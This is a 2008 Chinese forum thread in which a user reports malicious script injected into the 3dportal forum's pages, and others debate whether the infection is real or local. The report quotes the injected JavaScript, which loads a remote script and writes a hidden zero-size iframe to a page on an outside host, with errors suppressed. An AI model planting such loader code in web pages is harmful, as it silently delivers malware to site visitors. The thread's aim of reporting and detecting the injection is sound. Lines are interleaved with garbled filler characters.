此网被挂马

czy12

马:Hack.Exploit.Script.JS.Mixed.c

1. <script language="javascript" SRC="  ' target=_blank>http://u.cruze3.cn/u.js"></script>
   / A% e' m& U2 F6 p/ A$ u" g% E
2. 
   , m! e# p, X9 W4 C* h/ p5 J
3. document.writeln("<script>";
   9 `7 @$ i3 E* d+ W$ x. S
4. document.writeln("function oK_Begin(){";
   
5. document.writeln("var Then = new Date() ";
   
6. document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)";
   
7. document.writeln("var cookieString = new String(document.cookie)";
   
8. document.writeln("var cookieHeader = "Cookie1=" ";
   
9. document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)";
   
10. document.writeln("if (beginPosition != -1){ ";
    $ }3 f* _6 Z' f' |
11. document.writeln("} else ";
    $ y( H( o- a$ b% K; L
12. document.writeln("{ document.cookie = "Cookie1=POPWINDOS;expires="+ Then.toGMTString() ";
    
13. document.writeln("document.write(\'<iframe width=0 height=0 src="\'">http://u.cruze3.cn/u.htm"><\/iframe>\');";
    
14. document.writeln("}";
    ; t4 t. F# j! g( M. O+ O
15. document.writeln("}";
    7 i4 k/ B2 \1 f3 o
16. document.writeln("oK_Begin();";
    # |4 G% d' N7 p( u% J
17. document.writeln("<\/script>";
    * t0 U/ o4 `: W$ Q
18. document.writeln("<script>window.onerror=function(){return true;}<\/script>"
    
19. 
    4 Z3 X9 O1 j4 N" N" z7 i* K' j) N* s: |
20. 
    + S' H; Z9 ?, A; e/ o" X% V
21. 
    - e- p3 D/ P. q+ v$ n- _
22. 
    
23. 
    + i  l) U3 @! X) A' F2 k" l; z4 K

复制代码

虽然从表面上去看是个恶意代码,但里面可能包含马,试图打开此网页u.htm,而此网页可能是网页木马

19720205

请管理员确认是否网页挂马?

cayuer

我的麦咖啡都没检测出来 你什么杀毒软件？

czy12

不是杀软件查的.
只是无意中去看了源文件,感觉网头中的u.js很是反常(按常理说,很少在HEAD前,且根目录并是是此网站,于是,下载了u.js,发现不对头.它试图以最小化打开U.HTM网页,按平时的经验,它不是毒就是马,很少有人会在论坛上放毒,一般多是放马.
不过,已经被清理了.

HEHE只是没有礼貌

% Y6 ?" r2 g$ u. f/ ?# b# `[ 本帖最后由 czy12 于 2008-11-26 16:25 编辑 ]

江南有雪

你这个什么网站，哪里出来的？

ht tp://u.cruze3.cn/u.js

czy12

http://u.cruze3.cn/u.js
此网是个挂马网,是不可能看到的(他才不会那么笨,HEHE),一般都通过本地IIS进行域名转向.
  X0 m0 @& W! d4 K; S; M这是昨天我想看别的网页的源文件时,无意中点了此网页的源文件,才发现不对头.
- p; E& u7 u7 \3 E: sHEHE

wwqq

这跟三维有什么关系？

czy12

这是挂在三维网论坛里的.
; E8 G* R" A! {6 r, |7 f红线所指

huang_baker

奇怪，为什么我的里面没有？是不是楼主的机器自己带病毒了？

小雪

自己的机子中毒了，就不要满天喊叫了，没人会认为你是一个杀毒的行家

czy12

不学无术.
) I/ B. _7 p4 Q- E1 M$ KHEHE

yyywwwhk

但在:
http://www.3dportal.cn/discuz/ 之原始檔
似乎看不见楼主所说的 http://u.cruze3.cn/u.js

: q: t& z: r, I% D% w% p[ 本帖最后由 yyywwwhk 于 2008-11-27 16:23 编辑 ]

新洁电子

经过自编扫描代码处理结果，未发现楼主说的挂马代码！

请清理自己计算机的缓冲区！

college

看您的尾符/script，很像是U盘病毒。

czy12

DZ6.1有代码自我修复功能。甚至可以在服务程序中设置定时还原数据库。
* q/ r2 n& v( n2 C) R; P( m, I我也说了：已修复。

ps:这与缓存毫无关系。虽然缓存中有U.JS.
但本机上的毒是不会去改动你的网页内容的.我的机子中毒,和你的网页源代码有何相关?
7 _9 ]. |" N3 X0 p/ j) k3 y! q8 z8 S
script是个JAVA代码,与U盘何关?
) s8 O) ^6 m7 v& ~- C3 h, a8 q
HEHE
# ]0 n; ?" i' Y' [- Z) O
7 A9 T1 S' G* {- @) _# I/ f) z[ 本帖最后由 czy12 于 2008-11-27 16:03 编辑 ]

新洁电子

非也，代码是程序直接采样的当时的网页代码，是自编的，算不上权威，但是可以直接进入部分加密网站！

. j( Q: ?4 x+ F$ \* N如果却如你说的修改了，我想，这只有论坛管理员有这个权限，即便是后台也是有记录的。假如确实是论坛后台修改了，一定会给大伙一个说法的。
- V9 G  T6 v; L6 f9 a
$ b  r% ]1 [7 E3 Y; e! H9 G相反，目前从各方面提供的代码显示，确实“此时此刻”是正常的！至于继续讨论已经无大的价值！